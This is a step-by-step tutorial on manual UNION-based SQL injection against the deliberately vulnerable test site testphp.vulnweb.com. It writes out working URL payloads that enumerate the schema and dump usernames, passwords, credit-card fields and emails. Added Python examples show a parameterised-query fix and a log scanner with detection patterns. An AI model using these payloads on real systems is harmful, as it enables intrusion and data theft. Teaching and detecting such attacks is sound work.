This tutorial will help explain the steps in performing a manual SQL injection against a MYSQL database. By doing it manually you are learning the necessary skills and knowledge required to advance in the field of ethical hacking. The goal is to continuously learn and advance your skills. Never stop learning!
Here are the 5 steps in performing a Basic SQL injection.
- Find a website that is vulnerable.
- Find a vulnerable column.
- Identify the version of MYSQL.
- Identify more tables in the database, like the USER table.
- Extract the data you want from the database, like usernames, passwords etc.
We have to find a website which is vulnerable to SQL injection (SQLi) attacks. A SQLi vulnerability has 2 criteria.
Firstly, it has to allow execution of queries from the URL, and secondly, it should show an error for some kind of query or other. An error is an indication of a SQL vulnerability.
After we know that a site is vulnerable, we need to execute a few queries to make it act in an unexpected manner. Then we should obtain information about the SQL version, find some useful tables and finally extract the data we want from those tables.
An important note on performing SQL injection: in all cases you need to balance the SQL query, so that the statement the server ends up running is still syntactically valid.
You do this by:
- adding SQL comment code to your query to comment out the rest of the query so it doesn't run.
- Fitting your query into an existing SQL statement.
This is the same way we need to ensure the HTML syntax stays intact when we inject code to perform XSS attacks.
Step 1 - How to identify a potential SQL database that is vulnerable to injection
There are two important factors that need to hold for the database to be vulnerable.
- A SQL database is vulnerable if it allows the execution of SQL queries from the URL. Ask yourself this: does the website allow the underlying PHP code to request data from the database?
- Does the SQL database fail to sanitise or escape dangerous characters?
Once you have found a site that allows the underlying website to interact with the database, you can test for bad sanitisation by adding a single quote ' to the query:
http://testphp.vulnweb.com/listproducts.php?cat=1'
The ' is used to identify how the server handles bad inputs. If it does not have mechanisms for sanitizing or escaping dangerous characters, you will receive some kind of SQL error.
Look for any words that may relate to a database. Tables, columns, select, order, SQL, MYSQL etc....
The idea in this step is to confirm that the database is vulnerable.
We now know that:
- http://testphp.vulnweb.com is vulnerable
- The table that lists products could be vulnerable.
Step 2 - Finding a vulnerable column
Now you need to identify the number of columns in the table. An easy way to achieve this is by utilising ORDER BY.
- ORDER BY is used to sort your results by one or more columns. For example, let's say you have a table called CARS. Inside that table you have columns to describe the CAR:
* Make (Column1)
* Model (Column2)
* Engine Type (Column3)
* Amount of Turbos (Column4)
* Colour (Column5)
* Fuel consumption (Column6)
Now let's say you want to list all the cars in the table, but sort them based on the amount of Turbos they have.
The SQL statement below will select all cars and ORDER BY Column4:
SELECT * FROM Cars
ORDER BY 4;
How this helps us you ask?
Well, if I used the following SQL statement to try and ORDER BY column 7, I would get a SQL error stating that column 7 does not exist:
SELECT * FROM Cars
ORDER BY 7;
By utilising ORDER BY we can essentially identify the number of columns within that table. You just keep increasing the column number until you get a SQL error.
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+12

ORDER BY 12 produces an error while ORDER BY 11 does not, which means that the table only has 11 columns.
Now we need to find out which of those 11 columns allows us to inject input. We can achieve this by utilising the UNION operator.
UNION - used to combine the results of one or more SELECT commands.
We use the UNION operator to combine our first SELECT with our second SELECT.
The below command lists all products with category 1, aka posters. By adding
union+select+'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10','vuln11'
we are adding an additional dummy poster with our own values against each column, i.e. we concatenate one more row to the output:
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10','vuln11'
- You then need to identify which of those 11 columns are vulnerable.
- Looking at the results, notice how vuln7, vuln2 and vuln9 are visible on the page. These particular columns are being used to display information on the webpage and can thus be used to extract information from the database.
- That means that columns 2,7,9 allow SQL injection.

- Column 11 actually also allows SQL injection. Run the same command, but change the query to listproducts.php?cat=-1 so that the original SELECT matches nothing and only our newly created ROW is shown:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10','vuln11'

Important note on mysql_real_escape_string
- It is a PHP function that escapes special characters in a string for use in an SQL statement.
- For the sake of the example, let's pretend this was enabled.
This query would then fail, because the quotes around each vuln string get escaped:
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10','vuln11'
Luckily you can also use the hex value of each string (always prefix your HEX with 0x in the SQL statement), which needs no quotes at all. If we replaced each of our vuln strings with its HEX equivalent we would still get the same output.
Below I am only replacing vuln2 with its HEX equivalent 0x76756c6e32. You could of course do this for all the values.
And the results are exactly the same:

We now know that:
- http://testphp.vulnweb.com is vulnerable
- The table that lists products could be vulnerable.
- The table has 11 columns.
- Columns 2,7,9,11 allow SQL injection
Important question - Why does the database even allow us to inject data into the SQL query?
- Think about how PHP and a database work together.
- When you first create a database you create a user and give that user the permissions to read/write to the database.
- You then build a website with PHP with specific functions that query the database in a controlled manner.
- Those functions to query the database are made available to a user in a controlled manner by the use of a website frontend in the form of buttons, search boxes, input forms etc....
- All those functions are passed back to PHP which in turn requests data from the SQL server.
- By doing the above SQLi we are bypassing the functions made available to us and passing data directly to the SQL server.
- By doing this we can inject false data into a query and request data we were not supposed to see.
- Remember that computers are not AI and will only check what you tell them to check!
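As an added example (not code from the original tutorial), here is the mechanism behind this in Python: a constructed 11-column products table in SQLite stands in for the MySQL table behind listproducts.php, the concatenated query accepts the quote, ORDER BY and UNION inputs from steps 1 and 2, and the parameterised version, which is the fix, treats the same inputs as plain values. Using SQLite instead of MySQL is an assumption of the example; the error and UNION behaviour shown carry over.

```python
import sqlite3

# Constructed stand-in for the listproducts.php query: a products table
# with 11 columns (the count the ORDER BY probing found). SQLite is used
# here instead of MySQL; ORDER BY, UNION and the quote error behave alike.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT, descr TEXT,"
               " price REAL, rating INTEGER, img TEXT, stock INTEGER, vendor TEXT,"
               " weight REAL, sku TEXT)")
    db.execute("INSERT INTO products VALUES (1,1,'poster','d',9,5,'p.jpg',3,'acme',1,'A1')")
    db.execute("INSERT INTO products VALUES (2,2,'mug','d',4,4,'m.jpg',8,'acme',1,'B2')")
    return db

def list_products_vulnerable(db, cat):
    # Mirrors string concatenation in PHP: the URL value is pasted into the SQL
    # text, so whatever the user appends becomes part of the statement.
    return db.execute("SELECT * FROM products WHERE cat=" + cat).fetchall()

def list_products_safe(db, cat):
    # Parameterised query: the value is bound as data and never parsed as SQL,
    # so a quote, ORDER BY or UNION inside it is just a category that matches nothing.
    return db.execute("SELECT * FROM products WHERE cat=?", (cat,)).fetchall()

def probe(db, cat):
    """Run the vulnerable query and return ('rows', rows) or ('error', message);
    the error text is what the tutorial reads off the page as its signal."""
    try:
        return ("rows", list_products_vulnerable(db, cat))
    except sqlite3.Error as e:
        return ("error", str(e))

# The step-2 payload: no product has category -1, so only the UNION row comes back.
UNION_ROW = "-1 UNION SELECT " + ",".join("'vuln%d'" % i for i in range(1, 12))

if __name__ == "__main__":
    db = make_db()
    for value in ["1", "1'", "1 ORDER BY 11", "1 ORDER BY 12", UNION_ROW]:
        print(repr(value), "->", probe(db, value))
    print("safe:", list_products_safe(db, UNION_ROW))  # [] : bound as a value
```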
Step 3 - Identifying the MYSQL version
Why do we need this? - Databases and different versions of databases have their own ways to extract data.... Besides the more you know the better!
Below is a list of the other things you can try running against a database to obtain useful information.

Before we go on, let's run the user() function.
- user()
- system_user()
Running this shows us the current database user. Think how dangerous having this information could be. I have a username and username format.


- @@version
Using column2
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+'vuln1',@@version,'vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10','vuln11'

Using column11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10',@@version

Great so we know that the version of MYSQL is 5.1.73-0 and the underlying system is Ubuntu 10.04.1.
Important note on MYSQL functions
I'm not entirely sure about what type of security protects this, but I will update once I know.
If your function to retrieve the version of the database fails you have two options (maybe more).
- convert(@@version using latin1)
- unhex(hex(@@version))
We now know that:
- http://testphp.vulnweb.com is vulnerable
- The table that lists products could be vulnerable.
- The table has 11 columns.
- Columns 2,7,9 allow SQL injection
- MYSQL version is 5.1.73-0
- Running on Ubuntu 10.04.1
Step 4 - Identify more Tables in the database
INFORMATION_SCHEMA is actually a database that exists on the MYSQL instance. It stores information about all the other MYSQL databases on that server.
You can use it to query information about the tables within a database, information like the table_name and table_type. What we are interested in is what other tables exist within the database. Using your prior knowledge, let's run a query against the database to list all other table_names using column2 as our entry point:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+

To make it easier to READ we could use GROUP_CONCAT(). The function is used to concatenate column values into a single string, so all table names are output as one string:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+

Great, so I would say the valuable table here is users. In the next step we will identify its columns and extract some data.
Step 5 - Identify columns in the user table and extract data
In a similar way we can now list all the columns inside the USERS table.
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11+from+information_schema.columns+where+table_schema=database() and table_name='users'--+
Important note - if you get an error at any point, try converting your strings to HEX. Luckily for us the 'users' string works without the need for conversion to HEX.
Lots of juicy bits here:
- uname - most likely the usernames
- pass - passwords
- cc - maybe credit card details
- email - email addresses
Now that we have the columns we want to extract data from, we can construct our final query to extract the data.
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+all+select+1,group_concat('user:',uname,'----pass:',pass,'-----cc:',cc,'------email:',email),3,4,5,6,7,8,9,10,11+from+users--+
We are adding some separating text like 'user:', '----pass:' etc. in between the columns to better separate the output.
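As an added example (not part of the original tutorial), a small Python log scanner that recognises the request shapes used in steps 1 to 5 above in constructed web-server access-log lines, so a defender can spot the same probing against their own site; it also decodes 0x hex literals back to text, as in the mysql_real_escape_string note. The log lines, client addresses and rule names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not real traffic) shaped like the tutorial's
# requests: a quote probe, ORDER BY counting, a UNION SELECT carrying a hex
# literal, and an information_schema enumeration ending in a comment.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /listproducts.php?cat=1+order+by+12 HTTP/1.1" 200 790
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /listproducts.php?cat=-1+union+select+'vuln1',0x76756c6e32,'vuln3' HTTP/1.1" 200 4096
10.0.0.9 - - [01/Jan/2024:10:00:31 +0000] "GET /listproducts.php?cat=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--+ HTTP/1.1" 200 4300
"""

LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/')

# Payload shapes from steps 1-5, checked against each URL-decoded parameter value.
RULES = {
    "order-by-probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"information_schema\.|@@version|\b(?:system_)?user\(\)|group_concat\(", re.I),
    "hex-literal": re.compile(r"\b0x(?:[0-9a-f]{2})+\b", re.I),
    "comment-tail": re.compile(r"--(?:\s|$)|/\*"),
}

def decode_hex_literals(value):
    """Turn 0x... literals back into text so the analyst sees the injected string."""
    return [bytes.fromhex(m[2:]).decode("latin-1") for m in RULES["hex-literal"].findall(value)]

def scan_param(value):
    hits = [name for name, rx in RULES.items() if rx.search(value)]
    if value.count("'") % 2 == 1:  # an unbalanced quote is the step-1 error probe
        hits.append("unbalanced-quote")
    return hits

def scan_log(text):
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl decodes %27 and '+', so the rules see the SQL as the server did
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = scan_param(value)
            if hits:
                findings.append({"client": client, "param": name, "hits": hits,
                                 "decoded_hex": decode_hex_literals(value)})
    return findings
```

Calling scan_log(SAMPLE_LOG) flags the four probing requests and leaves the plain cat=1 request alone.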